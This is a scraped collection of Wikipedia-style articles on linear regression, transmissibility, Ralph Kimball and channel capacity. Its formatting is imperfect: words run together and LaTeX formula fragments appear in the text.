In linear regression, the relationships are modeled usinglinear predictor functionswhose unknown modelparametersareestimatedfrom thedata. Most commonly, theconditional meanof the response given the values of the explanatory variables (or predictors) is assumed to be anaffine functionof those values; less commonly, the conditionalmedianor some otherquantileis used. Like all forms ofregression analysis, linear regression focuses on theconditional probability distributionof the response given the values of the predictors, rather than on thejoint probability distributionof all of these variables, which is the domain ofmultivariate analysis.
Linear regression is also a type ofmachine learningalgorithm, more specifically asupervisedalgorithm, that learns from the labelled datasets and maps the data points to the most optimized linear functions that can be used for prediction on new datasets.[3]
Linear regression was the first type of regression analysis to be studied rigorously, and to be used extensively in practical applications.[4]This is because models which depend linearly on their unknown parameters are easier to fit than models which are non-linearly related to their parameters and because the statistical properties of the resulting estimators are easier to determine.
Linear regression has many practical uses. Most applications fall into one of the following two broad categories:
Linear regression models are often fitted using theleast squaresapproach, but they may also be fitted in other ways, such as by minimizing the "lack of fit" in some othernorm(as withleast absolute deviationsregression), or by minimizing a penalized version of the least squarescost functionas inridge regression(L2-norm penalty) andlasso(L1-norm penalty). Use of theMean Squared Error(MSE) as the cost on a dataset that has many large outliers, can result in a model that fits the outliers more than the true data due to the higher importance assigned by MSE to large errors. So, cost functions that are robust to outliers should be used if the dataset has many largeoutliers. Conversely, the least squares approach can be used to fit models that are not linear models. Thus, although the terms "least squares" and "linear model" are closely linked, they are not synonymous.
Given adata set{yi,xi1,…,xip}i=1n{\displaystyle \{y_{i},\,x_{i1},\ldots ,x_{ip}\}_{i=1}^{n}}ofnstatistical units, a linear regression model assumes that the relationship between the dependent variableyand the vector of regressorsxislinear. This relationship is modeled through adisturbance termorerror variableε—an unobservedrandom variablethat adds "noise" to the linear relationship between the dependent variable and regressors. Thus the model takes the formyi=β0+β1xi1+⋯+βpxip+εi=xiTβ+εi,i=1,…,n,{\displaystyle y_{i}=\beta _{0}+\beta _{1}x_{i1}+\cdots +\beta _{p}x_{ip}+\varepsilon _{i}=\mathbf {x} _{i}^{\mathsf {T}}{\boldsymbol {\beta }}+\varepsilon _{i},\qquad i=1,\ldots ,n,}whereTdenotes thetranspose, so thatxiTβis theinner productbetweenvectorsxiandβ.
Often thesenequations are stacked together and written inmatrix notationas
where
Fitting a linear model to a given data set usually requires estimating the regression coefficientsβ{\displaystyle {\boldsymbol {\beta }}}such that the error termε=y−Xβ{\displaystyle {\boldsymbol {\varepsilon }}=\mathbf {y} -\mathbf {X} {\boldsymbol {\beta }}}is minimized. For example, it is common to use the sum of squared errors‖ε‖22{\displaystyle \|{\boldsymbol {\varepsilon }}\|_{2}^{2}}as a measure ofε{\displaystyle {\boldsymbol {\varepsilon }}}for minimization.
Consider a situation where a small ball is being tossed up in the air and then we measure its heights of ascenthiat various moments in timeti. Physics tells us that, ignoring thedrag, the relationship can be modeled as
whereβ1determines the initial velocity of the ball,β2is proportional to thestandard gravity, andεiis due to measurement errors. Linear regression can be used to estimate the values ofβ1andβ2from the measured data. This model is non-linear in the time variable, but it is linear in the parametersβ1andβ2; if we take regressorsxi= (xi1,xi2) = (ti,ti2), the model takes on the standard form
Standard linear regression models with standard estimation techniques make a number of assumptions about the predictor variables, the response variable and their relationship. Numerous extensions have been developed that allow each of these assumptions to be relaxed (i.e. reduced to a weaker form), and in some cases eliminated entirely. Generally these extensions make the estimation procedure more complex and time-consuming, and may also require more data in order to produce an equally precise model.[citation needed]
The following are the major assumptions made by standard linear regression models with standard estimation techniques (e.g.ordinary least squares):
Violations of these assumptions can result in biased estimations ofβ, biased standard errors, untrustworthy confidence intervals and significance tests. Beyond these assumptions, several other statistical properties of the data strongly influence the performance of different estimation methods:
A fitted linear regression model can be used to identify the relationship between a single predictor variablexjand the response variableywhen all the other predictor variables in the model are "held fixed". Specifically, the interpretation ofβjis theexpectedchange inyfor a one-unit change inxjwhen the other covariates are held fixed—that is, the expected value of thepartial derivativeofywith respect toxj. This is sometimes called theunique effectofxjony. In contrast, themarginal effectofxjonycan be assessed using acorrelation coefficientorsimple linear regressionmodel relating onlyxjtoy; this effect is thetotal derivativeofywith respect toxj.
Care must be taken when interpreting regression results, as some of the regressors may not allow for marginal changes (such asdummy variables, or the intercept term), while others cannot be held fixed (recall the example from the introduction: it would be impossible to "holdtifixed" and at the same time change the value ofti2).
It is possible that the unique effect be nearly zero even when the marginal effect is large. This may imply that some other covariate captures all the information inxj, so that once that variable is in the model, there is no contribution ofxjto the variation iny. Conversely, the unique effect ofxjcan be large while its marginal effect is nearly zero. This would happen if the other covariates explained a great deal of the variation ofy, but they mainly explain variation in a way that is complementary to what is captured byxj. In this case, including the other variables in the model reduces the part of the variability ofythat is unrelated toxj, thereby strengthening the apparent relationship withxj.
The meaning of the expression "held fixed" may depend on how the values of the predictor variables arise. If the experimenter directly sets the values of the predictor variables according to a study design, the comparisons of interest may literally correspond to comparisons among units whose predictor variables have been "held fixed" by the experimenter. Alternatively, the expression "held fixed" can refer to a selection that takes place in the context of data analysis. In this case, we "hold a variable fixed" by restricting our attention to the subsets of the data that happen to have a common value for the given predictor variable. This is the only interpretation of "held fixed" that can be used in anobservational study.
The notion of a "unique effect" is appealing when studying acomplex systemwhere multiple interrelated components influence the response variable. In some cases, it can literally be interpreted as the causal effect of an intervention that is linked to the value of a predictor variable. However, it has been argued that in many cases multiple regression analysis fails to clarify the relationships between the predictor variables and the response variable when the predictors are correlated with each other and are not assigned following a study design.[9]
Numerous extensions of linear regression have been developed, which allow some or all of the assumptions underlying the basic model to be relaxed.
The simplest case of a singlescalarpredictor variablexand a single scalar response variableyis known assimple linear regression. The extension to multiple and/orvector-valued predictor variables (denoted with a capitalX) is known asmultiple linear regression, also known asmultivariable linear regression(not to be confused withmultivariate linear regression).[10]
Multiple linear regression is a generalization ofsimple linear regressionto the case of more than one independent variable, and aspecial caseof general linear models, restricted to one dependent variable. The basic model for multiple linear regression is
for each observationi=1,…,n{\textstyle i=1,\ldots ,n}.
In the formula above we considernobservations of one dependent variable andpindependent variables. Thus,Yiis theithobservation of the dependent variable,Xijisithobservation of thejthindependent variable,j= 1, 2, ...,p. The valuesβjrepresent parameters to be estimated, andεiis theithindependent identically distributed normal error.
In the more general multivariate linear regression, there is one equation of the above form for each ofm> 1 dependent variables that share the same set of explanatory variables and hence are estimated simultaneously with each other:
for all observations indexed asi= 1, ... ,nand for all dependent variables indexed asj = 1, ... ,m.
Nearly all real-world regression models involve multiple predictors, and basic descriptions of linear regression are often phrased in terms of the multiple regression model. Note, however, that in these cases the response variableyis still a scalar. Another term,multivariate linear regression, refers to cases whereyis a vector, i.e., the same asgeneral linear regression.
Model Assumptions to Check:
1. Linearity: Relationship between each predictor and outcome must be linear
2. Normality of residuals: Residuals should follow a normal distribution
3. Homoscedasticity: Constant variance of residuals across predicted values
4. Independence: Observations should be independent (not repeated measures)
SPSS: Use partial plots, histograms, P-P plots, residual vs. predicted plots
Thegeneral linear modelconsiders the situation when the response variable is not a scalar (for each observation) but a vector,yi. Conditional linearity ofE(y∣xi)=xiTB{\displaystyle E(\mathbf {y} \mid \mathbf {x} _{i})=\mathbf {x} _{i}^{\mathsf {T}}B}is still assumed, with a matrixBreplacing the vectorβof the classical linear regression model. Multivariate analogues ofordinary least squares(OLS) andgeneralized least squares(GLS) have been developed. "General linear models" are also called "multivariate linear models". These are not the same as multivariable linear models (also called "multiple linear models").
Various models have been created that allow forheteroscedasticity, i.e. the errors for different response variables may have differentvariances. For example,weighted least squaresis a method for estimating linear regression models when the response variables may have different error variances, possibly with correlated errors. (See alsoWeighted linear least squares, andGeneralized least squares.)Heteroscedasticity-consistent standard errorsis an improved method for use with uncorrelated but potentially heteroscedastic errors.
TheGeneralized linear model(GLM) is a framework for modeling response variables that are bounded or discrete. This is used, for example:
Generalized linear models allow for an arbitrarylink function,g, that relates themeanof the response variable(s) to the predictors:E(Y)=g−1(XB){\displaystyle E(Y)=g^{-1}(XB)}. The link function is often related to the distribution of the response, and in particular it typically has the effect of transforming between the(−∞,∞){\displaystyle (-\infty ,\infty )}range of the linear predictor and the range of the response variable.
Some common examples of GLMs are:
Single index models[clarification needed]allow some degree of nonlinearity in the relationship betweenxandy, while preserving the central role of the linear predictorβ′xas in the classical linear regression model. Under certain conditions, simply applying OLS to data from a single-index model will consistently estimateβup to a proportionality constant.[11]
Hierarchical linear models(ormultilevel regression) organizes the data into a hierarchy of regressions, for example whereAis regressed onB, andBis regressed onC. It is often used where the variables of interest have a natural hierarchical structure such as in educational statistics, where students are nested in classrooms, classrooms are nested in schools, and schools are nested in some administrative grouping, such as a school district. The response variable might be a measure of student achievement such as a test score, and different covariates would be collected at the classroom, school, and school district levels.
Errors-in-variables models(or "measurement error models") extend the traditional linear regression model to allow the predictor variablesXto be observed with error. This error causes standard estimators ofβto become biased. Generally, the form of bias is an attenuation, meaning that the effects are biased toward zero.
In a multiple linear regression model
parameterβj{\displaystyle \beta _{j}}of predictor variablexj{\displaystyle x_{j}}represents the individual effect ofxj{\displaystyle x_{j}}. It has an interpretation as the expected change in the response variabley{\displaystyle y}whenxj{\displaystyle x_{j}}increases by one unit with other predictor variables held constant. Whenxj{\displaystyle x_{j}}is strongly correlated with other predictor variables, it is improbable thatxj{\displaystyle x_{j}}can increase by one unit with other variables held constant. In this case, the interpretation ofβj{\displaystyle \beta _{j}}becomes problematic as it is based on an improbable condition, and the effect ofxj{\displaystyle x_{j}}cannot be evaluated in isolation.
For a group of predictor variables, say,{x1,x2,…,xq}{\displaystyle \{x_{1},x_{2},\dots ,x_{q}\}}, a group effectξ(w){\displaystyle \xi (\mathbf {w} )}is defined as a linear combination of their parameters
wherew=(w1,w2,…,wq)⊺{\displaystyle \mathbf {w} =(w_{1},w_{2},\dots ,w_{q})^{\intercal }}is a weight vector satisfying∑j=1q|wj|=1{\textstyle \sum _{j=1}^{q}|w_{j}|=1}. Because of the constraint onwj{\displaystyle {w_{j}}},ξ(w){\displaystyle \xi (\mathbf {w} )}is also referred to as a normalized group effect. A group effectξ(w){\displaystyle \xi (\mathbf {w} )}has an interpretation as the expected change iny{\displaystyle y}when variables in the groupx1,x2,…,xq{\displaystyle x_{1},x_{2},\dots ,x_{q}}change by the amountw1,w2,…,wq{\displaystyle w_{1},w_{2},\dots ,w_{q}}, respectively, at the same time with other variables (not in the group) held constant. It generalizes the individual effect of a variable to a group of variables in that (i{\displaystyle i}) ifq=1{\displaystyle q=1}, then the group effect reduces to an individual effect, and (ii{\displaystyle ii}) ifwi=1{\displaystyle w_{i}=1}andwj=0{\displaystyle w_{j}=0}forj≠i{\displaystyle j\neq i}, then the group effect also reduces to an individual effect.
A group effectξ(w){\displaystyle \xi (\mathbf {w} )}is said to be meaningful if the underlying simultaneous changes of theq{\displaystyle q}variables(x1,x2,…,xq)⊺{\displaystyle (x_{1},x_{2},\dots ,x_{q})^{\intercal }}is probable.
Group effects provide a means to study the collective impact of strongly correlated predictor variables in linear regression models. Individual effects of such variables are not well-defined as their parameters do not have good interpretations. Furthermore, when the sample size is not large, none of their parameters can be accurately estimated by theleast squares regressiondue to themulticollinearityproblem. Nevertheless, there are meaningful group effects that have good interpretations and can be accurately estimated by the least squares regression. A simple way to identify these meaningful group effects is to use an all positive correlations (APC) arrangement of the strongly correlated variables under which pairwise correlations among these variables are all positive, and standardize allp{\displaystyle p}predictor variables in the model so that they all have mean zero and length one. To illustrate this, suppose that{x1,x2,…,xq}{\displaystyle \{x_{1},x_{2},\dots ,x_{q}\}}is a group of strongly correlated variables in an APC arrangement and that they are not strongly correlated with predictor variables outside the group. Lety′{\displaystyle y'}be the centredy{\displaystyle y}andxj′{\displaystyle x_{j}'}be the standardizedxj{\displaystyle x_{j}}. Then, the standardized linear regression model is
Parametersβj{\displaystyle \beta _{j}}in the original model, includingβ0{\displaystyle \beta _{0}}, are simple functions ofβj′{\displaystyle \beta _{j}'}in the standardized model. The standardization of variables does not change their correlations, so{x1′,x2′,…,xq′}{\displaystyle \{x_{1}',x_{2}',\dots ,x_{q}'\}}is a group of strongly correlated variables in an APC arrangement and they are not strongly correlated with other predictor variables in the standardized model. A group effect of{x1′,x2′,…,xq′}{\displaystyle \{x_{1}',x_{2}',\dots ,x_{q}'\}}is
and its minimum-variance unbiased linear estimator is
whereβ^j′{\displaystyle {\hat {\beta }}_{j}'}is the least squares estimator ofβj′{\displaystyle \beta _{j}'}. In particular, the average group effect of theq{\displaystyle q}standardized variables is
which has an interpretation as the expected change iny′{\displaystyle y'}when allxj′{\displaystyle x_{j}'}in the strongly correlated group increase by(1/q){\displaystyle (1/q)}th of a unit at the same time with variables outside the group held constant. With strong positive correlations and in standardized units, variables in the group are approximately equal, so they are likely to increase at the same time and in similar amount. Thus, the average group effectξA{\displaystyle \xi _{A}}is a meaningful effect. It can be accurately estimated by its minimum-variance unbiased linear estimatorξ^A=1q(β^1′+β^2′+⋯+β^q′){\textstyle {\hat {\xi }}_{A}={\frac {1}{q}}({\hat {\beta }}_{1}'+{\hat {\beta }}_{2}'+\dots +{\hat {\beta }}_{q}')}, even when individually none of theβj′{\displaystyle \beta _{j}'}can be accurately estimated byβ^j′{\displaystyle {\hat {\beta }}_{j}'}.
Not all group effects are meaningful or can be accurately estimated. For example,β1′{\displaystyle \beta _{1}'}is a special group effect with weightsw1=1{\displaystyle w_{1}=1}andwj=0{\displaystyle w_{j}=0}forj≠1{\displaystyle j\neq 1}, but it cannot be accurately estimated byβ^1′{\displaystyle {\hat {\beta }}'_{1}}. It is also not a meaningful effect. In general, for a group ofq{\displaystyle q}strongly correlated predictor variables in an APC arrangement in the standardized model, group effects whose weight vectorsw{\displaystyle \mathbf {w} }are at or near the centre of the simplex∑j=1qwj=1{\textstyle \sum _{j=1}^{q}w_{j}=1}(wj≥0{\displaystyle w_{j}\geq 0}) are meaningful and can be accurately estimated by their minimum-variance unbiased linear estimators. Effects with weight vectors far away from the centre are not meaningful as such weight vectors represent simultaneous changes of the variables that violate the strong positive correlations of the standardized variables in an APC arrangement. As such, they are not probable. These effects also cannot be accurately estimated.
Applications of the group effects include (1) estimation and inference for meaningful group effects on the response variable, (2) testing for "group significance" of theq{\displaystyle q}variables via testingH0:ξA=0{\displaystyle H_{0}:\xi _{A}=0}versusH1:ξA≠0{\displaystyle H_{1}:\xi _{A}\neq 0}, and (3) characterizing the region of the predictor variable space over which predictions by the least squares estimated model are accurate.
A group effect of the original variables{x1,x2,…,xq}{\displaystyle \{x_{1},x_{2},\dots ,x_{q}\}}can be expressed as a constant times a group effect of the standardized variables{x1′,x2′,…,xq′}{\displaystyle \{x_{1}',x_{2}',\dots ,x_{q}'\}}. The former is meaningful when the latter is. Thus meaningful group effects of the original variables can be found through meaningful group effects of the standardized variables.[12]
InDempster–Shafer theory, or alinear belief functionin particular, a linear regression model may be represented as a partially swept matrix, which can be combined with similar matrices representing observations and other assumed normal distributions and state equations. The combination of swept or unswept matrices provides an alternative method for estimating linear regression models.
A large number of procedures have been developed forparameterestimation and inference in linear regression. These methods differ in computational simplicity of algorithms, presence of aclosed-form solution,robustnesswith respect to heavy-tailed distributions, and theoretical assumptions needed to validate desirable statistical properties such asconsistencyand asymptoticefficiency.
Some of the more common estimation techniques for linear regression are summarized below.
Assuming that the independent variables arexi→=[x1i,x2i,…,xmi]{\displaystyle {\vec {x_{i}}}=\left[x_{1}^{i},x_{2}^{i},\ldots ,x_{m}^{i}\right]}and the model's parameters areβ→=[β0,β1,…,βm]{\displaystyle {\vec {\beta }}=\left[\beta _{0},\beta _{1},\ldots ,\beta _{m}\right]}, then the model's prediction would be
Ifxi→{\displaystyle {\vec {x_{i}}}}is extended toxi→=[1,x1i,x2i,…,xmi]{\displaystyle {\vec {x_{i}}}=\left[1,x_{1}^{i},x_{2}^{i},\ldots ,x_{m}^{i}\right]}thenyi{\displaystyle y_{i}}would become adot productof the parameter and the independent vectors, i.e.
In the least-squares setting, the optimum parameter vector is defined as such that minimizes the sum of mean squared loss:
Now putting the independent and dependent variables in matricesX{\displaystyle X}andY{\displaystyle Y}respectively, the loss function can be rewritten as:
As the loss function isconvex, the optimum solution lies atgradientzero. The gradient of the loss function is (usingDenominator layout convention):
Setting the gradient to zero produces the optimum parameter:
Note:Theβ^{\displaystyle {\hat {\beta }}}obtained may indeed be the local minimum, one needs to differentiate once more to obtain theHessian matrixand show that it is positive definite. This is provided by theGauss–Markov theorem.
Linear least squaresmethods include mainly:
Maximum likelihood estimationcan be performed when the distribution of the error terms is known to belong to a certain parametric familyƒθofprobability distributions.[15]Whenfθis a normal distribution with zeromeanand variance θ, the resulting estimate is identical to the OLS estimate. GLS estimates are maximum likelihood estimates when ε follows a multivariate normal distribution with a knowncovariance matrix.
Let's denote each data point by(xi→,yi){\displaystyle ({\vec {x_{i}}},y_{i})}and the regression parameters asβ→{\displaystyle {\vec {\beta }}}, and the set of all data byD{\displaystyle D}and the cost function byL(D,β→)=∑i(yi−β→⋅xi→)2{\displaystyle L(D,{\vec {\beta }})=\sum _{i}(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}})^{2}}.
As shown below the same optimal parameter that minimizesL(D,β→){\displaystyle L(D,{\vec {\beta }})}achieves maximum likelihood too.[16]Here the assumption is that the dependent variabley{\displaystyle y}is a random variable that follows aGaussian distribution, where the standard deviation is fixed and the mean is a linear combination ofx→{\displaystyle {\vec {x}}}:H(D,β→)=∏i=1nPr(yi|xi→;β→,σ)=∏i=1n12πσexp(−(yi−β→⋅xi→)22σ2){\displaystyle {\begin{aligned}H(D,{\vec {\beta }})&=\prod _{i=1}^{n}Pr(y_{i}|{\vec {x_{i}}}\,\,;{\vec {\beta }},\sigma )\\&=\prod _{i=1}^{n}{\frac {1}{{\sqrt {2\pi }}\sigma }}\exp \left(-{\frac {\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}}{2\sigma ^{2}}}\right)\end{aligned}}}
Now, we need to look for a parameter that maximizes this likelihood function. Since the logarithmic function is strictly increasing, instead of maximizing this function, we can also maximize its logarithm and find the optimal parameter that way.[16]
I(D,β→)=log∏i=1nPr(yi|xi→;β→,σ)=log∏i=1n12πσexp(−(yi−β→⋅xi→)22σ2)=nlog12πσ−12σ2∑i=1n(yi−β→⋅xi→)2{\displaystyle {\begin{aligned}I(D,{\vec {\beta }})&=\log \prod _{i=1}^{n}Pr(y_{i}|{\vec {x_{i}}}\,\,;{\vec {\beta }},\sigma )\\&=\log \prod _{i=1}^{n}{\frac {1}{{\sqrt {2\pi }}\sigma }}\exp \left(-{\frac {\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}}{2\sigma ^{2}}}\right)\\&=n\log {\frac {1}{{\sqrt {2\pi }}\sigma }}-{\frac {1}{2\sigma ^{2}}}\sum _{i=1}^{n}\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}\end{aligned}}}
The optimal parameter is thus equal to:[16]
arg maxβ→I(D,β→)=arg maxβ→(nlog12πσ−12σ2∑i=1n(yi−β→⋅xi→)2)=arg minβ→∑i=1n(yi−β→⋅xi→)2=arg minβ→L(D,β→)=β^→{\displaystyle {\begin{aligned}{\underset {\vec {\beta }}{\mbox{arg max}}}\,I(D,{\vec {\beta }})&={\underset {\vec {\beta }}{\mbox{arg max}}}\left(n\log {\frac {1}{{\sqrt {2\pi }}\sigma }}-{\frac {1}{2\sigma ^{2}}}\sum _{i=1}^{n}\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}\right)\\&={\underset {\vec {\beta }}{\mbox{arg min}}}\sum _{i=1}^{n}\left(y_{i}-{\vec {\beta }}\,\cdot \,{\vec {x_{i}}}\right)^{2}\\&={\underset {\vec {\beta }}{\mbox{arg min}}}\,L(D,{\vec {\beta }})\\&={\vec {\hat {\beta }}}\end{aligned}}}
In this way, the parameter that maximizesH(D,β→){\displaystyle H(D,{\vec {\beta }})}is the same as the one that minimizesL(D,β→){\displaystyle L(D,{\vec {\beta }})}. This means that in linear regression, the result of the least squares method is the same as the result of the maximum likelihood estimation method.[16]
Ridge regression[17][18][19]and other forms of penalized estimation, such asLasso regression,[5]deliberately introducebiasinto the estimation ofβin order to reduce thevariabilityof the estimate. The resulting estimates generally have lowermean squared errorthan the OLS estimates, particularly whenmulticollinearityis present or whenoverfittingis a problem. They are generally used when the goal is to predict the value of the response variableyfor values of the predictorsxthat have not yet been observed. These methods are not as commonly used when the goal is inference, since it is difficult to account for the bias.
Least absolute deviation(LAD) regression is arobust estimationtechnique in that it is less sensitive to the presence of outliers than OLS (but is lessefficientthan OLS when no outliers are present). It is equivalent to maximum likelihood estimation under aLaplace distributionmodel forε.[20]
If we assume that error terms areindependentof the regressors,εi⊥xi{\displaystyle \varepsilon _{i}\perp \mathbf {x} _{i}}, then the optimal estimator is the 2-step MLE, where the first step is used to non-parametrically estimate the distribution of the error term.[21]
Linear regression is widely used in biological, behavioral and social sciences to describe possible relationships between variables. It ranks as one of the most important tools used in these disciplines.
Atrend linerepresents a trend, the long-term movement intime seriesdata after other components have been accounted for. It tells whether a particular data set (say GDP, oil prices or stock prices) have increased or decreased over the period of time. A trend line could simply be drawn by eye through a set of data points, but more properly their position and slope is calculated using statistical techniques like linear regression. Trend lines typically are straight lines, although some variations use higher degree polynomials depending on the degree of curvature desired in the line.
Trend lines are sometimes used in business analytics to show changes in data over time. This has the advantage of being simple. Trend lines are often used to argue that a particular action or event (such as training, or an advertising campaign) caused observed changes at a point in time. This is a simple technique, and does not require a control group, experimental design, or a sophisticated analysis technique. However, it suffers from a lack of scientific validity in cases where other potential changes can affect the data.
Early evidence relatingtobacco smokingto mortality andmorbiditycame fromobservational studiesemploying regression analysis. In order to reducespurious correlationswhen analyzing observational data, researchers usually include several variables in their regression models in addition to the variable of primary interest. For example, in a regression model in which cigarette smoking is the independent variable of primary interest and the dependent variable is lifespan measured in years, researchers might include education and income as additional independent variables, to ensure that any observed effect of smoking on lifespan is not due to those othersocio-economic factors. However, it is never possible to include all possibleconfoundingvariables in an empirical analysis. For example, a hypothetical gene might increase mortality and also cause people to smoke more. For this reason,randomized controlled trialsare often able to generate more compelling evidence of causal relationships than can be obtained using regression analyses of observational data. When controlled experiments are not feasible, variants of regression analysis such asinstrumental variablesregression may be used to attempt to estimate causal relationships from observational data.
Thecapital asset pricing modeluses linear regression as well as the concept ofbetafor analyzing and quantifying the systematic risk of an investment. This comes directly from the beta coefficient of the linear regression model that relates the return on the investment to the return on all risky assets.
Linear regression is the predominant empirical tool ineconomics. For example, it is used to predictconsumption spending,[24]fixed investmentspending,inventory investment, purchases of a country'sexports,[25]spending onimports,[25]thedemand to hold liquid assets,[26]labor demand,[27]andlabor supply.[27]
Linear regression finds application in a wide range of environmental science applications such asland use,[28]infectious diseases,[29]andair pollution.[30]For example, linear regression can be used to predict the changing effects of car pollution.[31]One notable example of this application in infectious diseases is theflattening the curvestrategy emphasized early in the COVID-19 pandemic, where public health officials dealt with sparse data on infected individuals and sophisticated models of disease transmission to characterize the spread of COVID-19.[32]
Linear regression is commonly used inbuilding sciencefield studies to derive characteristics of building occupants. In athermal comfortfield study, building scientists usually ask occupants' thermal sensation votes, which range from -3 (feeling cold) to 0 (neutral) to +3 (feeling hot), and measure occupants' surrounding temperature data. A neutral or comfort temperature can be calculated based on a linear regression between the thermal sensation vote and indoor temperature, and setting the thermal sensation vote as zero. However, there has been a debate on the regression direction: regressing thermal sensation votes (y-axis) against indoor temperature (x-axis) or the opposite: regressing indoor temperature (y-axis) against thermal sensation votes (x-axis).[33]
Linear regression plays an important role in the subfield ofartificial intelligenceknown asmachine learning. The linear regression algorithm is one of the fundamentalsupervised machine-learningalgorithms due to its relative simplicity and well-known properties.[34]
Isaac Newtonis credited with inventing "a certain technique known today aslinear regression analysis" in his work on equinoxes in 1700, and wrote down the first of the two normal equations of theordinary least squaresmethod.[35][36]The Least squares linear regression, as a means of finding a good rough linear fit to a set of points was performed byLegendre(1805) andGauss(1809) for the prediction of planetary movement.Queteletwas responsible for making the procedure well-known and for using it extensively in the social sciences.[37]
|
https://en.wikipedia.org/wiki/Line_regression
|
Transmissibilitymay have several meanings:
In most contexts, transmissibility is related topermeability.
In medicine, transmissibility is a synonym forbasic reproduction numberand refers totransmission.
|
https://en.wikipedia.org/wiki/Transmissibility_(disambiguation)
|
Ralph Kimball(born July 18, 1944[1]) is an author on the subject ofdata warehousingandbusiness intelligence. He is one of the original architects ofdata warehousingand is known for long-term convictions that data warehouses must be designed to be understandable and fast.[2][3]His bottom-up methodology, also known asdimensional modelingor the Kimball methodology, is one of the two main data warehousing methodologies alongsideBill Inmon.[2][3]
He is the principal author of the best-selling[4]booksThe Data Warehouse Toolkit(1996),[5]The Data Warehouse Lifecycle Toolkit(1998),The Data Warehouse ETL Toolkit(2004) andThe Kimball Group Reader(2015), published byWiley and Sons.
After receiving a Ph.D.[4]in 1973 fromStanford Universityin electrical engineering (specializing in man-machine systems), Ralph joined theXerox Palo Alto Research Center(PARC). At PARC Ralph was a principal designer of theXerox StarWorkstation, the first commercial product to usemice, icons and windows.
Kimball then became vice president of applications atMetaphor Computer Systems, adecision support softwareand services provider. He developed the Capsule Facility in 1982. The Capsule was a graphical programming technique which connected icons together in a logical flow, allowing a very visual style of programming for non-programmers. The Capsule was used to build reporting and analysis applications at Metaphor.
Kimball foundedRed Brick Systemsin 1986, serving as CEO until 1992. The company was acquired byInformix, which is now owned byIBM.[6]Red Brick was known for itsrelational databaseoptimized for data warehousing. Their claim to fame was the use of bit-mapIndexesin order to achieve performance gains that amounted to almost 10 times that of other Database vendors at that time.
Since 1992, Kimball has provided data warehouse consulting and education through various companies such as Ralph Kimball Associates and the Kimball Group.[7][4]
|
https://en.wikipedia.org/wiki/Ralph_Kimball
|
Channel capacity, inelectrical engineering,computer science, andinformation theory, is the theoretical maximum rate at whichinformationcan be reliably transmitted over acommunication channel.
Following the terms of thenoisy-channel coding theorem, the channel capacity of a givenchannelis the highest information rate (in units ofinformationper unit time) that can be achieved with arbitrarily small error probability.[1][2]
Information theory, developed byClaude E. Shannonin 1948, defines the notion of channel capacity and provides a mathematical model by which it may be computed. The key result states that the capacity of the channel, as defined above, is given by the maximum of themutual informationbetween the input and output of the channel, where the maximization is with respect to the input distribution.[3]
The notion of channel capacity has been central to the development of modern wireline and wireless communication systems, with the advent of novelerror correction codingmechanisms that have resulted in achieving performance very close to the limits promised by channel capacity.
The basic mathematical model for a communication system is the following:
where:
LetX{\displaystyle X}andY{\displaystyle Y}be modeled as random variables. Furthermore, letpY|X(y|x){\displaystyle p_{Y|X}(y|x)}be theconditional probability distributionfunction ofY{\displaystyle Y}givenX{\displaystyle X}, which is an inherent fixed property of the communication channel. Then the choice of themarginal distributionpX(x){\displaystyle p_{X}(x)}completely determines thejoint distributionpX,Y(x,y){\displaystyle p_{X,Y}(x,y)}due to the identity
which, in turn, induces amutual informationI(X;Y){\displaystyle I(X;Y)}. Thechannel capacityis defined as
where thesupremumis taken over all possible choices ofpX(x){\displaystyle p_{X}(x)}.
Channel capacity is additive over independent channels.[4]It means that using two independent channels in a combined manner provides the same theoretical capacity as using them independently.
More formally, letp1{\displaystyle p_{1}}andp2{\displaystyle p_{2}}be two independent channels modelled as above;p1{\displaystyle p_{1}}having an input alphabetX1{\displaystyle {\mathcal {X}}_{1}}and an output alphabetY1{\displaystyle {\mathcal {Y}}_{1}}. Idem forp2{\displaystyle p_{2}}.
We define the product channelp1×p2{\displaystyle p_{1}\times p_{2}}as∀(x1,x2)∈(X1,X2),(y1,y2)∈(Y1,Y2),(p1×p2)((y1,y2)|(x1,x2))=p1(y1|x1)p2(y2|x2){\displaystyle \forall (x_{1},x_{2})\in ({\mathcal {X}}_{1},{\mathcal {X}}_{2}),\;(y_{1},y_{2})\in ({\mathcal {Y}}_{1},{\mathcal {Y}}_{2}),\;(p_{1}\times p_{2})((y_{1},y_{2})|(x_{1},x_{2}))=p_{1}(y_{1}|x_{1})p_{2}(y_{2}|x_{2})}
This theorem states:C(p1×p2)=C(p1)+C(p2){\displaystyle C(p_{1}\times p_{2})=C(p_{1})+C(p_{2})}
We first show thatC(p1×p2)≥C(p1)+C(p2){\displaystyle C(p_{1}\times p_{2})\geq C(p_{1})+C(p_{2})}.
LetX1{\displaystyle X_{1}}andX2{\displaystyle X_{2}}be two independent random variables. LetY1{\displaystyle Y_{1}}be a random variable corresponding to the output ofX1{\displaystyle X_{1}}through the channelp1{\displaystyle p_{1}}, andY2{\displaystyle Y_{2}}forX2{\displaystyle X_{2}}throughp2{\displaystyle p_{2}}.
By definitionC(p1×p2)=suppX1,X2(I(X1,X2:Y1,Y2)){\displaystyle C(p_{1}\times p_{2})=\sup _{p_{X_{1},X_{2}}}(I(X_{1},X_{2}:Y_{1},Y_{2}))}.
SinceX1{\displaystyle X_{1}}andX2{\displaystyle X_{2}}are independent, as well asp1{\displaystyle p_{1}}andp2{\displaystyle p_{2}},(X1,Y1){\displaystyle (X_{1},Y_{1})}is independent of(X2,Y2){\displaystyle (X_{2},Y_{2})}. We can apply the following property ofmutual information:I(X1,X2:Y1,Y2)=I(X1:Y1)+I(X2:Y2){\displaystyle I(X_{1},X_{2}:Y_{1},Y_{2})=I(X_{1}:Y_{1})+I(X_{2}:Y_{2})}
